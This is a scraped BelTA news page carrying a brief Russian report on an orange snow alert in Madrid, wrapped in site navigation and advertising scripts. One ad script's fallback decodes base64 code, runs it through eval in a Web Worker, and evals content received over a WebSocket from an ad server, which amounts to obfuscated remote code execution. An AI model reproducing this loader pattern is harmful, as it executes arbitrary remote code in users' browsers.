href="http://twitter.com/share?text=%D0%9E%D1%80%D0%B0%D0%BD%D0%B6%D0%B5%D0%B2%D1%8B%D0%B9%20%D1%83%D1%80%D0%BE%D0%B2%D0%B5%D0%BD%D1%8C%20%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%BE%D0%B1%D1%8A%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%20%D0%B2%20%D0%9C%D0%B0%D0%B4%D1%80%D0%B8%D0%B4%D0%B5%20%D0%B8%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B3%D0%BE%D0%BF%D0%B0%D0%B4%D0%B0&url=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F&counturl=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F" target="_blank" class="twitter">t</a>                <a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F" target="_blank" class="google">g</a>                <a href="http://connect.mail.ru/share?url=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F&title=%D0%9E%D1%80%D0%B0%D0%BD%D0%B6%D0%B5%D0%B2%D1%8B%D0%B9%20%D1%83%D1%80%D0%BE%D0%B2%D0%B5%D0%BD%D1%8C%20%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%BE%D0%B1%D1%8A%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%20%D0%B2%20%D0%9C%D0%B0%D0%B4%D1%80%D0%B8%D0%B4%D0%B5%20%D0%B8%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B3%D0%BE%D0%BF%D0%B0%D0%B4%D0%B0&description=%D0%98%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B6%D0%BD%D1%8B%D1%85%20%D0%B7%D0%B0%D0%BD%D0%BE%D1%81%D0%BE%D0%B2%20%D0%B8%20%D0%BE%D0%B1%D0%BB%D0%B5%D0%B4%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B7%D0%B0%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B5%D0%BD%D0%BE%20%D0%B4%D0%B2%D0%B8%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20387%20%D1%82%D1%80%D0%B0%D1%81%D1%81%D0%B0%D1%85%20%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B%2C%2056%20%D0%B8%D0%B7%20%D0%BD%D0%B8%D1%85%20%D0%BF%D0%B5%D1%80%D0%B5%D0%BA%D1%80%D1%8B%D1%82%D1%8B.%20%D0%94%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D1%8B%D0%B5%20%D1%81%D0%BB%D1%83%D0%B6%D0%B1%D1%8B%20%D1%81%D0%BE%D0%B2%D0%B5%D1%82%D1%83%D1%8E%D1%82%20%D0%B2%D0%BE%D0%B4%D0%B8%D1%82%D0%B5%D0%BB%D1%8F%D0%BC%20%D0%BF%D0%BE%20%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%B2%D0%BE%D0%B7%D0%B4%D0%B5%D1%80%D0%B6%D0%B0%D1%82%D1%8C%D1%81%D1%8F%20%D0%BE%D1%82%20%D0%BF%D0%BE%D0%B5%D0%B7%D0%B4%D0%BE%D0%BA.&imageurl=http%3A%2F%2Fwww.belta.by%2Fimages%2Fstorage%2Fnews%2F000026_1517840719_big.jpg" target="_blank" class="mailru">m</a></div>
    </div>
    
            <div class="img_doc">
          <img src="http://www.belta.by/images/storage/news/000026_1517840719_big.jpg" alt="" title=""/>
                  </div>
            
    <meta name="mediator_published_time" content="2018-02-05T17:15:01+00:00" />
    <meta name="mediator_theme" content="В мире" />
            <meta name="mediator_theme" content="зима" />
            <meta name="mediator_theme" content="Испания" />
            <meta name="mediator_theme" content="погода" />
            <meta name="mediator_theme" content="реагирование на ЧС" />
        <meta name="mediator" content="/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/" />

        <div class="js-mediator-article">
    <p>5 февраля, Минск /Корр. БЕЛТА/. В столице Испании объявили оранжевый уровень опасности из-за сильного снегопада, сообщает ТАСС.</p><p></p><p>В настоящее время рейсы из мадридского аэропорта "Барахас" задержаны на один час. Пассажирам рекомендуется заранее уточнять время вылета и прибытия самолетов в "Барахас", а также Эль-Прат - аэропорт Барселоны. Специалисты очищают взлетно-посадочные полосы от обледенения и снега.</p><p></p><p>Из-за снежных заносов и обледенения затруднено движение на 387 трассах страны, 56 из них перекрыты. Дорожные службы советуют водителям по возможности воздержаться от поездок.-0-</p><p></p>
    </div>
                                ﻿<script id="js-mpf-mediator-init" data-counter="2771154" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2.0/mpf-mediator.min.js","_mediator")}(window);</script>

            
        
    <div class="clear"></div>
                <div class="news_tags_block">
        <div class="tags_title">Теги</div>
	    	    	<a href="http://www.belta.by/search/findTags/1221">зима</a>, 	    	    	<a href="http://www.belta.by/search/findTags/730">Испания</a>, 	    	    	<a href="http://www.belta.by/search/findTags/461">погода</a>, 	    	    	<a href="http://www.belta.by/search/findTags/377">реагирование на ЧС</a>	            </div>
                    <div class="sh_p">
                                                                <div class="share_footer">
        <span>Поделиться: </span>
                        <div>
<script type="text/javascript">(function(w,doc) {
if (!w.__utlWdgt ) {
    w.__utlWdgt = true;
    var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
}})(window,document);
</script>
<div data-mobile-view="true" data-share-size="30" data-follow-button-text="ВСТУПИТЬ В ГРУППУ!" data-like-text-enable="false" data-additional-network-text="а еще мы есть:" data-background-alpha="0.0" data-pid="36769" data-mode="share" data-background-color="#ededed" data-follow-yt="beltavideo" data-share-shape="round-rectangle" data-share-counter-size="12" data-icon-color="#ffffff" data-mobile-sn-ids="tw.vk.ok.fb.vb.wh.tm." data-text-color="#000000" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-follow-ok="beltanews" data-share-counter-type="common" data-follow-text="У нас есть группа %network%" data-orientation="horizontal" data-following-enable="true" data-sn-ids="tw.ok.vk.fb.mr.tm." data-follow-in="beltanews" data-preview-mobile="false" data-selection-enable="false" data-follow-title="Приглашаем стать друзьями!" data-exclude-show-more="true" data-share-style="13" data-follow-vk="beltanews" data-follow-tw="beltanews" data-counter-background-alpha="1.0" data-top-button="true" data-follow-fb="beltanews" class="uptolike-buttons" ></div>
</div>
            
       
    </div>

                                        <div class="print_right">
            <a href="/printv/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/" onclick="window.open('/printv/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/');return false" class="print_icon">Версия для печати</a><br/>
        </div>
        <div class="clear"></div>
    </div>    		
<style>.news_inf_part_block{background-color: #eff1f3;font-size:18px;}
.news_inf_part_block_titles div{font-size: 18px;}
.news_inf_part_block_titles div:first-child{font-weight: bold;}
.news_inf_part_block_titles div a{font-weight: bold;}
.news_inf_part_block_titles div:hover a{background-color: #93bb53;color:#fff;border-top-color: #93bb53;}
.news_inf_part_block_title_active, .news_inf_part_block_titles div:hover{color:#fff;}
.news_inf_part_block_title_active a {color:#fff;background-color: #578f00;border-top-color: #93bb53;}
.news_inf_item:hover{background-color: #e6efd9;}
.news_inf_part_title a{color: #578f00;}
.news_inf_part_title:hover{background-color: #93bb53;}
.news_inf_part_title_sel a{color: #fff;background-color: #578f00;}
.news_inf_part_inf_wrap{border: 1px solid #93bb53;background-color: #fff;}
.news_inf_item span{font-size:17px;}
.news_inf_part_wrap_title{font-size: 18px;font-weight: bold;color:#000;}
.news_inf_part_wrap_title span{font-size:18px;font-weight: normal;line-height: 1.2}
.news_inf_part_wrap_title:hover{color:#578f00;}
</style> 
<div id="n_t"></div> 
<script id="informerSrc" type="text/javascript" src="http://www.belta.by/jscript/newsPartnerInformer_new.js?countN=6&currPartnId=1&informer_target=blank&countAllBl=2">
</script>
                    <a class="news_in_rubric_title" href="http://www.belta.by/world">Новости рубрики В мире</a>
    <div class="news_in_rubric">
        <div class="news_in_rubric_col">
        
            <div>
                          	                	                		                                    <a href="/world/view/v-majjami-hozjain-bara-vzjal-v-zalozhniki-okolo-12-chelovek-288075-2018/"  title="В Майями хозяин бара взял в заложники около 12 человек" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517867912_small.jpg" alt="Фото из социальных сетей" title="Фото из социальных сетей"/>
                    </a>
                                <a href="/world/view/v-majjami-hozjain-bara-vzjal-v-zalozhniki-okolo-12-chelovek-288075-2018/"  title="В Майями хозяин бара взял в заложники около 12 человек">
                    В Майями хозяин бара взял в заложники около 12 человек
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                        01:00
                                 
                                    </div>
            </div>
                
            <div>
                          	                	                		                                    <a href="/world/view/na-maldivah-vveli-chrezvychajnoe-polozhenie-288072-2018/"  title="На Мальдивах ввели чрезвычайное положение" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517862864_small.jpg" alt="Абдулла Ямин" title="Абдулла Ямин"/>
                    </a>
                                <a href="/world/view/na-maldivah-vveli-chrezvychajnoe-polozhenie-288072-2018/"  title="На Мальдивах ввели чрезвычайное положение">
                    На Мальдивах ввели чрезвычайное положение
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        23:35
                                 
                                    </div>
            </div>
                
            <div>
                          	                	                		                                    <a href="/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/"  title="Оранжевый уровень опасности объявлен в Мадриде из-за снегопада" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517840719_small.jpg" alt="" title=""/>
                    </a>
                                <a href="/world/view/oranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018/"  title="Оранжевый уровень опасности объявлен в Мадриде из-за снегопада">
                    Оранжевый уровень опасности объявлен в Мадриде из-за снегопада
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        17:15
                                 
                                    </div>
            </div>
                    </div>
            <div class="news_in_rubric_col">
                
            <div>
                          	                	                		                                    <a href="/world/view/sugroby-do-55-sm-snegopad-v-moskve-stal-silnejshim-za-100-let-288038-2018/"  title="Сугробы до 55 см. Снегопад в Москве стал сильнейшим за 100 лет" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517839728_small.jpg" alt="" title=""/>
                    </a>
                                <a href="/world/view/sugroby-do-55-sm-snegopad-v-moskve-stal-silnejshim-za-100-let-288038-2018/"  title="Сугробы до 55 см. Снегопад в Москве стал сильнейшим за 100 лет">
                    Сугробы до 55 см. Снегопад в Москве стал сильнейшим за 100 лет
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        17:00
                                 
                                    </div>
            </div>
                
            <div>
                          	                	                		                                    <a href="/world/view/muzhchina-s-holodnym-oruzhiem-pytalsja-vojti-v-zdanie-administratsii-prezidenta-irana-288009-2018/"  title="Мужчина с холодным оружием пытался войти в здание администрации президента Ирана" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517831359_small.jpg" alt="Фото из архива" title="Фото из архива"/>
                    </a>
                                <a href="/world/view/muzhchina-s-holodnym-oruzhiem-pytalsja-vojti-v-zdanie-administratsii-prezidenta-irana-288009-2018/"  title="Мужчина с холодным оружием пытался войти в здание администрации президента Ирана">
                    Мужчина с холодным оружием пытался войти в здание администрации президента Ирана
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        14:43
                                 
                                    </div>
            </div>
                
            <div>
                          	                	                		                                    <a href="/world/view/dlja-balkanskih-stran-ne-budet-avtomaticheskogo-vstuplenija-v-es-kabmin-frg-288006-2018/"  title="Для балканских стран не будет автоматического вступления в ЕС - кабмин ФРГ" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517830059_small.jpg" alt="Штеффен Зайберт" title="Штеффен Зайберт"/>
                    </a>
                                <a href="/world/view/dlja-balkanskih-stran-ne-budet-avtomaticheskogo-vstuplenija-v-es-kabmin-frg-288006-2018/"  title="Для балканских стран не будет автоматического вступления в ЕС - кабмин ФРГ">
                    Для балканских стран не будет автоматического вступления в ЕС - кабмин ФРГ
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        14:23
                                 
                                    </div>
            </div>
                    </div>
            <div class="news_in_rubric_col">
                
            <div>
                          	                	                		                                    <a href="/world/view/v-japonii-voennyj-vertolet-upal-na-zhiloj-dom-oba-pilota-pogibli-287999-2018/"  title="В Японии военный вертолет упал на жилой дом, оба пилота погибли" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517828560_small.jpg" alt="" title=""/>
                    </a>
                                <a href="/world/view/v-japonii-voennyj-vertolet-upal-na-zhiloj-dom-oba-pilota-pogibli-287999-2018/"  title="В Японии военный вертолет упал на жилой дом, оба пилота погибли">
                    В Японии военный вертолет упал на жилой дом, оба пилота погибли
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        13:53
                                 
                                    </div>
            </div>
                
            <div>
                          	                	                		                                    <a href="/world/view/konfederatsija-profsojuzov-azerbajdzhana-vydvigaet-kandidaturu-ilhama-alieva-na-prezidentskih-vyborah-287988-2018/"  title="Конфедерация профсоюзов Азербайджана выдвигает кандидатуру Ильхама Алиева на президентских выборах" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517826576_small.jpg" alt="Ильхам Алиев. Фото Trend" title="Ильхам Алиев. Фото Trend"/>
                    </a>
                                <a href="/world/view/konfederatsija-profsojuzov-azerbajdzhana-vydvigaet-kandidaturu-ilhama-alieva-na-prezidentskih-vyborah-287988-2018/"  title="Конфедерация профсоюзов Азербайджана выдвигает кандидатуру Ильхама Алиева на президентских выборах">
                    Конфедерация профсоюзов Азербайджана выдвигает кандидатуру Ильхама Алиева на президентских выборах
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        13:17
                                 
                                    </div>
            </div>
                
            <div>
                          	                	                		                                    <a href="/world/view/v-kyrgyzstane-zaderzhany-chetyre-grazhdanina-odnoj-iz-stran-sng-za-dachu-vzjatki-v-osobo-krupnom-287986-2018/"  title="В Кыргызстане задержаны четыре гражданина одной из стран СНГ за дачу взятки в особо крупном размере" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517826789_small.jpg" alt="Фото из архива" title="Фото из архива"/>
                    </a>
                                <a href="/world/view/v-kyrgyzstane-zaderzhany-chetyre-grazhdanina-odnoj-iz-stran-sng-za-dachu-vzjatki-v-osobo-krupnom-287986-2018/"  title="В Кыргызстане задержаны четыре гражданина одной из стран СНГ за дачу взятки в особо крупном размере">
                    В Кыргызстане задержаны четыре гражданина одной из стран СНГ за дачу взятки в особо крупном размере
                </a>
                <div class="news_in_rubric_date">
                               	 		          
                            Вчера
                        13:09
                                 
                                    </div>
            </div>
                </div>
    </div>
        <div class="all_block all_block_down"><a href="http://www.belta.by/world/" title="К списку">К списку</a></div>
    	        	<style>
    
    /*Yandex. реклама*/
    .yap-yandex_ad-horizontal{background-color: #eff1f3!important;margin-top:30px!important;padding: 20px 15px 10px 25px !important;}
    .yap-yandex_ad-horizontal .yap-layout__wrapper{border:0px!important;border-top:1px solid #d4d6d7!important}
    .yap-yandex_ad-horizontal .yap-logo-block__text{background-color: #d4d6d7!important}
    .yap-yandex_ad-horizontal .yap-layout__logo{background-color: #d4d6d7!important}
    .yap-yandex_ad-horizontal .yap-logo-block__arrow{background-color: #d4d6d7!important;display: none!important}
    .yap-yandex_ad-horizontal, .yap-yandex_ad-horizontal .yap-layout__sitelinks, .yap-yandex_ad-horizontal .yap-layout__schedule, .yap-yandex_ad-horizontal .yap-layout__contacts, .yap-yandex_ad-horizontal .yap-layout__warning{font-size:14px;font-size:0.8725rem}
    .yap-yandex_ad-horizontal .yap-layout__body{font-size:13px;font-size:0.8125rem}
    
</style>
                
                        <script id="r35061" type="text/javascript">
    (function() {
        var worker35061,
            tickerID = 35061,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'çàãðóçêà...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/35/ticker_35061.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker35061.postMessage(data);
                }

                worker35061 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker35061.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker35061.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>


<!-- Yandex.RTB R-A-132717-4 -->
<div id="yandex_rtb_R-A-132717-4"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-132717-4",
                renderTo: "yandex_rtb_R-A-132717-4",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>


<!-- <div id="DIV_NNN_260064"></div>
<script charset="windows-1251" type="text/javascript" src="//www.nnn.ru/show.cgi?adp=260064&div=DIV_NNN_260064"></script> -->


<!-- Composite Start -->
<div id="M364493ScriptRootC619266"> 
    <div id="M364493PreloadC619266"> Çàãðóçêà... 
    </div> 
    <script> (function(){ var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById'; var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M364493ScriptRootC619266")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];} catch(e){var iw=d;var c=d[gi]("M364493ScriptRootC619266");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=619266;c[ac](dv); var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.lentainform.com/b/e/belta.by.619266.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})(); 
    </script> 
</div> 
<!-- Composite End -->

            
        

    
    </div>
</div>   
    </div>
    <div class="inner_right_part">
                                                                           
                            <div class="bans bannerLeftCol bans_flash">
                    
                                        <iframe src="/uploads/files/evroopt5okt/240x400-Belta-winners.html" scrolling="no" frameborder="0" allowfullscreen  class="bans_html5iframe"></iframe>
                </div>
                
                         
    
        <!--noindex-->
    	    <div class="lentaSliderBlock topNewsBlockIn">
    <div class="lenta_title">Топ-новости</div>
    <div id="lentaRubric" class="lentaSlider">
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/society/view/k-100-letiju-belta-naviny-skladajuts-gistoryju-287949-2018/" title="К 100-летию БЕЛТА: &quot;Навiны складаюць гiсторыю&quot;. БелКТА и НЭП"  >
                К 100-летию БЕЛТА: "Навiны складаюць гiсторыю". БелКТА и НЭП
                 
                <span class="with_photo"></span>            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/sport/view/komanda-prezidenta-belarusi-pobedila-veteranov-hokkeja-shvejtsarii-287876-2018/" title="Команда Президента Беларуси победила ветеранов хоккея Швейцарии"  >
                Команда Президента Беларуси победила ветеранов хоккея Швейцарии
                <span class="with_video"></span> 
                <span class="with_photo"></span>            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/onlineconference/view/deklarirovanie-dohodov-grazhdan-1013/" title="Онлайн-конференция по декларированию доходов граждан пройдет на сайте БЕЛТА 7 февраля" target='_blank' >
                Онлайн-конференция по декларированию доходов граждан пройдет на сайте БЕЛТА 7 февраля
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/society/view/zakon-o-personalnyh-dannyh-planiruetsja-podgotovit-v-2018-godu-288044-2018/" title="Закон о персональных данных планируется подготовить в 2018 году"  >
                Закон о персональных данных планируется подготовить в 2018 году
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/society/view/do-18-gradusov-moroza-ozhidaetsja-v-belarusi-6-fevralja-287951-2018/" title="До 18 градусов мороза ожидается в Беларуси 6 февраля"  >
                До 18 градусов мороза ожидается в Беларуси 6 февраля
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/society/view/posolstvo-frantsii-v-belarusi-predosteregaet-ot-obraschenij-v-psevdovizovye-tsentry-287978-2018/" title="Посольство Франции в Беларуси предостерегает от обращений в псевдовизовые центры"  >
                Посольство Франции в Беларуси предостерегает от обращений в псевдовизовые центры
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/society/view/glavy-ministerstv-provedut-v-fevrale-vyezdnye-priemy-grazhdan-287715-2018/" title="Главы министерств проведут в феврале выездные приемы граждан"  >
                Главы министерств проведут в феврале выездные приемы граждан
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/society/view/besplatnye-chasy-v-fitnes-tsentrah-organizujut-v-belarusi-9-11-fevralja-288026-2018/" title="Бесплатные часы в фитнес-центрах организуют в Беларуси 9-11 февраля"  >
                Бесплатные часы в фитнес-центрах организуют в Беларуси 9-11 февраля
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/sport/view/belorus-jurij-zhukovskij-zavoeval-titul-chempiona-mira-po-kikboksingu-288015-2018/" title="Белорус Юрий Жуковский завоевал титул чемпиона мира по кикбоксингу"  >
                Белорус Юрий Жуковский завоевал титул чемпиона мира по кикбоксингу
                 
                            </a>
       </div>
                                       	           	                <div class="lenta_item">
            <div class="block_slider_bkgr"></div>
            <a href="http://www.belta.by/incident/view/bolee-10-mashin-povredili-upavshie-iz-za-nepogody-derevjja-v-gomelskoj-oblasti-287912-2018/" title="Более 10 машин повредили упавшие из-за непогоды деревья в Гомельской области"  >
                Более 10 машин повредили упавшие из-за непогоды деревья в Гомельской области
                 
                <span class="with_photo"></span>            </a>
       </div>
        </div>
    </div>

<script type="text/javascript">
    var hidden_slides = Array();
    hidden_slides[0] = "lentaRubric";
</script>
        <!--/noindex-->
    	               
                            <div class="bans bannerLeftCol">
                    <a href="http://www.belta.by/horoscope/horoHealthAllSigns/tommorow?utm_source=belta&utm_medium=banner&utm_campaign=bannerright" title="Гороскоп на завтра"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000146_8af1d0765ac31281cd2880989c733cf6_work.jpg" alt="Гороскоп на завтра" title="Гороскоп на завтра" />
                    </a>
                </div>                    
           
                    
    
    	                        <div class="pogoda_block sp_pogoda_block">
<div class="weather_block_title">
    <div class="weather_title">Погода</div>
    <form>
        <input type="hidden" id="selCity" name="selCity" value="12"/>
        <div class="citySelect">
            <span id="cityName" onclick="open_block('city_hidden')">Минск</span>
            <span class="cityDown"></span>
            
        </div>
            <div id="city_hidden"> 
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '14', this, 'city_hidden');get_page('/meteo/blockInner/14','fp_weather_info', 0, '', '', 1);set_cookie('city', '14')">Барановичи</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '15', this, 'city_hidden');get_page('/meteo/blockInner/15','fp_weather_info', 0, '', '', 1);set_cookie('city', '15')">Бобруйск</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '8', this, 'city_hidden');get_page('/meteo/blockInner/8','fp_weather_info', 0, '', '', 1);set_cookie('city', '8')">Борисов</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '18', this, 'city_hidden');get_page('/meteo/blockInner/18','fp_weather_info', 0, '', '', 1);set_cookie('city', '18')">Брест</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '1', this, 'city_hidden');get_page('/meteo/blockInner/1','fp_weather_info', 0, '', '', 1);set_cookie('city', '1')">Варшава</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '7', this, 'city_hidden');get_page('/meteo/blockInner/7','fp_weather_info', 0, '', '', 1);set_cookie('city', '7')">Вильнюс</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '6', this, 'city_hidden');get_page('/meteo/blockInner/6','fp_weather_info', 0, '', '', 1);set_cookie('city', '6')">Витебск</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '20', this, 'city_hidden');get_page('/meteo/blockInner/20','fp_weather_info', 0, '', '', 1);set_cookie('city', '20')">Гомель</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '10', this, 'city_hidden');get_page('/meteo/blockInner/10','fp_weather_info', 0, '', '', 1);set_cookie('city', '10')">Гродно</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '16', this, 'city_hidden');get_page('/meteo/blockInner/16','fp_weather_info', 0, '', '', 1);set_cookie('city', '16')">Жлобин</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '21', this, 'city_hidden');get_page('/meteo/blockInner/21','fp_weather_info', 0, '', '', 1);set_cookie('city', '21')">Киев</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '11', this, 'city_hidden');get_page('/meteo/blockInner/11','fp_weather_info', 0, '', '', 1);set_cookie('city', '11')">Лида</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '12', this, 'city_hidden');get_page('/meteo/blockInner/12','fp_weather_info', 0, '', '', 1);set_cookie('city', '12')">Минск</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '13', this, 'city_hidden');get_page('/meteo/blockInner/13','fp_weather_info', 0, '', '', 1);set_cookie('city', '13')">Могилёв</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '19', this, 'city_hidden');get_page('/meteo/blockInner/19','fp_weather_info', 0, '', '', 1);set_cookie('city', '19')">Мозырь</div>
